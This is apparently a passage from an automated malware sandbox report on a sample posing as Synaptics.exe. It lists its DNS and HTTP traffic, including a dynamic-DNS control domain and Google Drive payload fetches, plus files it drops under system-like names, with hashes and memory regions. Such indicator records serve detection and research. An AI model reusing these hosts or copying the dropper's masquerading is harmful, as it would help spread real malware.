      Response
      HTTP/1.1 200 OK
      Content-Length: 1078
      Content-Type: application/octet-stream
      Content-MD5: PjrtHAukbJio72s77Ag5mA==
      Last-Modified: Thu, 31 Oct 2024 23:26:09 GMT
      ETag: 0x8DCFA0366D6C4CA
      x-ms-request-id: aa584fbb-e01e-0040-08ef-2b50d2000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 27 Nov 2024 01:15:22 GMT
      Connection: keep-alive
      TLS_version: UNKNOWN
      ms-cv: CASMicrosoftCV679c7153.0
      ms-cv-esi: CASMicrosoftCV679c7153.0
      X-RTag: RT
    • 69.42.215.252:80
      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
      http
      Synaptics.exe
      706 B
      415 B
      12
      4

      HTTP Request

      GET http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

      HTTP Response

      200
    • 142.250.187.206:443
      https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      tls, http
      Synaptics.exe
      1.7kB
      11.2kB
      12
      15

      HTTP Request

      GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

      HTTP Response

      303

      HTTP Request

      GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

      HTTP Response

      303

      HTTP Request

      GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

      HTTP Response

      303
    • 142.250.200.3:80
      http://c.pki.goog/r/r1.crl
      http
      Synaptics.exe
      348 B
      1.7kB
      5
      4

      HTTP Request

      GET http://c.pki.goog/r/r1.crl

      HTTP Response

      200
    • 142.250.200.3:80
      http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDHA1yyGqTiRQmAB36tPEBH
      http
      Synaptics.exe
      794 B
      3.1kB
      7
      6

      HTTP Request

      GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEGoFYJ0C3qQCbRh5xcgwPQ%3D

      HTTP Response

      200

      HTTP Request

      GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDHA1yyGqTiRQmAB36tPEBH

      HTTP Response

      200
    • 142.250.179.225:443
      https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      tls, http
      Synaptics.exe
      2.0kB
      14.5kB
      14
      21

      HTTP Request

      GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

      HTTP Response

      404

      HTTP Request

      GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

      HTTP Response

      404

      HTTP Request

      GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

      HTTP Response

      404
    • 88.221.134.83:80
      http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
      http
      399 B
      1.7kB
      4
      4

      HTTP Request

      GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl

      HTTP Response

      200
    • 95.100.245.144:80
      http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
      http
      445 B
      1.8kB
      5
      5

      HTTP Request

      GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

      HTTP Response

      200
    • 8.8.8.8:53
      xred.mooo.com
      dns
      Synaptics.exe
      59 B
      118 B
      1
      1

      DNS Request

      xred.mooo.com

    • 8.8.8.8:53
      freedns.afraid.org
      dns
      Synaptics.exe
      64 B
      80 B
      1
      1

      DNS Request

      freedns.afraid.org

      DNS Response

      69.42.215.252

    • 8.8.8.8:53
      docs.google.com
      dns
      Synaptics.exe
      61 B
      77 B
      1
      1

      DNS Request

      docs.google.com

      DNS Response

      142.250.187.206

    • 8.8.8.8:53
      c.pki.goog
      dns
      Synaptics.exe
      56 B
      107 B
      1
      1

      DNS Request

      c.pki.goog

      DNS Response

      142.250.200.3

    • 8.8.8.8:53
      o.pki.goog
      dns
      Synaptics.exe
      56 B
      107 B
      1
      1

      DNS Request

      o.pki.goog

      DNS Response

      142.250.200.3

    • 8.8.8.8:53
      drive.usercontent.google.com
      dns
      Synaptics.exe
      74 B
      90 B
      1
      1

      DNS Request

      drive.usercontent.google.com

      DNS Response

      142.250.179.225

    • 8.8.8.8:53
      crl.microsoft.com
      dns
      63 B
      162 B
      1
      1

      DNS Request

      crl.microsoft.com

      DNS Response

      88.221.134.83
      88.221.134.146

    • 8.8.8.8:53
      www.microsoft.com
      dns
      63 B
      230 B
      1
      1

      DNS Request

      www.microsoft.com

      DNS Response

      95.100.245.144

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\Synaptics\Synaptics.exe

      Filesize

      3.3MB

      MD5

      e3a3e6d5bcdf3fe8c6c525429e401b1f

      SHA1

      a1b2370bd81715b63dd6268e301a7101d39d3ebc

      SHA256

      805c795be5f0324f0e1d2bca61beabaf1d1d054eca2ad0224588295bb9d41299

      SHA512

      be86d4785df2de0b0f4e74c9f56988d7df0dc6ed2bd2d2632b83266a73ed72491b50a3db557d83ce5cca65ed1b98c97d6c63a90045188896b02d2fa3484e8743

    • C:\Users\Admin\AppData\Local\Temp\s9QMut3j.xlsm

      Filesize

      22KB

      MD5

      72142dd2919c46f691a676cb273c34c2

      SHA1

      1a7e49ae3beea2ab0e5ffa5c871c32276bc0e887

      SHA256

      e01d1fada70005a26b33365a117dfd1b0c4c6d0e941f2e4856a1ef6fde15da00

      SHA512

      3828140efdcf1c9ec2d11cba332f1bf90cfea0e5d1419ced40870b258ca2b3c595f3a3bdf461240ab456728bba84356e48c54c1236a0718633ec25d891ec9b36

    • C:\Users\Admin\AppData\Local\Temp\s9QMut3j.xlsm

      Filesize

      17KB

      MD5

      e566fc53051035e1e6fd0ed1823de0f9

      SHA1

      00bc96c48b98676ecd67e81a6f1d7754e4156044

      SHA256

      8e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15

      SHA512

      a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04

    • C:\Windows\Resources\Themes\explorer.exe

      Filesize

      2.6MB

      MD5

      0c4affeb1489e7e5d679e6aed9760f7f

      SHA1

      b6e2e4a78db3f362acfefc30f2e8d94f832d9289

      SHA256

      30029729e153a417ff21f4a6cf66945e99e9a02e35c94ca07812dc293163bcb3

      SHA512

      186aa0959e3d5537ee117d3a2048c52e4490052b70f1358a7b8d1457e9fb854ebacfa82b61bcf044c0d8e71de10213a56bd3fdd5c78de91c20d5f54886c9eb14

    • C:\Windows\Resources\Themes\icsys.icn.exe

      Filesize

      2.6MB

      MD5

      4b81c8d3c1781a5450d47e893b843fda

      SHA1

      cf1486374f07285e5f322c77bcac15afa796b1d0

      SHA256

      4e66e9dbdae2842ed7e82e4a760efe02b5095ba9c9d5c14b8f2d7af4dda06949

      SHA512

      563004c3d69e852fe08acac123b8ec2ff0504807ad64e5c020c5aba0f825960c0bdcbf909bf265a2f88c66f4cc39edbde8dd2bde775cc6118e16e68570311c98

    • \Users\Admin\AppData\Local\Temp\._cache_805c795be5f0324f0e1d2bca61beabaf1d1d054eca2ad0224588295bb9d41299.exe

      Filesize

      2.6MB

      MD5

      b2126004e0cfc780aa831d168000852f

      SHA1

      4251dd9b19f247b83c4606b529693967a72c5f28

      SHA256

      693ac357b98fad2cbdb51b8bc1c793a0845944f15dea373b4c461065ec27a65e

      SHA512

      9d0d1f8928f9e24ceafb5c9cc78dafb25181844bc71caee71c5c239585db0a70a5e00f62478c20228747fa477d3833b46417eebfe075030f8768640588489755

    • \Users\Admin\AppData\Local\Temp\._cache_synaptics.exe 

      Filesize

      25KB

      MD5

      430e3b88d419c28a6bad535825054894

      SHA1

      1657fd5ed8ab28f34df264f39cfc44f539704778

      SHA256

      eacba1545f69917190d13efea6558c23cdb04a13cfffeb2c5b27ffdf10781a2b

      SHA512

      728406141cbeed5357ced6073cd75c75afb24a916eed9bbdc64c034a8b2c080c110828cc241cc5ec1248d64c3a67487a88ad7d4351878d3ec0bec37a67de7256

    • \Windows\Resources\spoolsv.exe

      Filesize

      2.6MB

      MD5

      d1929226f5bef2d52cb5e351c25f5984

      SHA1

      840d781ada05101d65b2249bbe0f46e3c4aff3e8

      SHA256

      ac05b18c41d977a498d66c27b6618305d00ec5570567357c1822e3419c734109

      SHA512

      6e30d9aeea6cc7118c02dc7a3d70b466fd97d173fc2043432230ad7cce462adf233506796a5f4ef02fc825b497e155c8ffbc7defac06afb9105ba3f13a71aa61

    • \Windows\Resources\svchost.exe

      Filesize

      2.6MB

      MD5

      861c5dd8097bf9d9be9715d84670c5b5

      SHA1

      52864caa07749659054cf58cd67ad640f5d6a746

      SHA256

      dc76955d22f67c1c736bbd96838fa51b064dfff633fb169031cc1c80056381aa

      SHA512

      9f1361d8f1e48020c15a128f514954135ce86ba098c535fb9fd077e82b401233843416d1807d2faa6ce72644169ef923dbe8a03136cc0097dc7d86831f9d6b09

    • memory/1188-134-0x0000000003260000-0x0000000003876000-memory.dmp

      Filesize

      6.1MB

    • memory/1188-164-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/1188-220-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/1188-163-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/1188-165-0x0000000003260000-0x0000000003876000-memory.dmp

      Filesize

      6.1MB

    • memory/1188-121-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/1388-93-0x0000000003820000-0x0000000003E36000-memory.dmp

      Filesize

      6.1MB

    • memory/1388-160-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/1388-185-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/1388-72-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/1388-215-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/1648-139-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/1648-119-0x0000000003770000-0x0000000003D86000-memory.dmp

      Filesize

      6.1MB

    • memory/1648-96-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/2160-214-0x0000000000400000-0x000000000075E000-memory.dmp

      Filesize

      3.4MB

    • memory/2160-161-0x0000000000400000-0x000000000075E000-memory.dmp

      Filesize

      3.4MB

    • memory/2160-129-0x00000000056A0000-0x0000000005CB6000-memory.dmp

      Filesize

      6.1MB

    • memory/2160-37-0x00000000056A0000-0x0000000005CB6000-memory.dmp

      Filesize

      6.1MB

    • memory/2160-167-0x0000000000400000-0x000000000075E000-memory.dmp

      Filesize

      3.4MB

    • memory/2268-135-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/2268-137-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/2320-53-0x000000013FC50000-0x000000013FC5E000-memory.dmp

      Filesize

      56KB

    • memory/2516-29-0x0000000000400000-0x000000000075E000-memory.dmp

      Filesize

      3.4MB

    • memory/2516-17-0x00000000059F0000-0x0000000006006000-memory.dmp

      Filesize

      6.1MB

    • memory/2516-0-0x00000000003A0000-0x00000000003A1000-memory.dmp

      Filesize

      4KB

    • memory/2600-48-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2628-70-0x0000000003740000-0x0000000003D56000-memory.dmp

      Filesize

      6.1MB

    • memory/2628-141-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/2628-58-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/2692-57-0x0000000003330000-0x0000000003946000-memory.dmp

      Filesize

      6.1MB

    • memory/2692-143-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/2692-130-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/2692-38-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/3000-118-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    • memory/3000-18-0x0000000000400000-0x0000000000A16000-memory.dmp

      Filesize

      6.1MB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.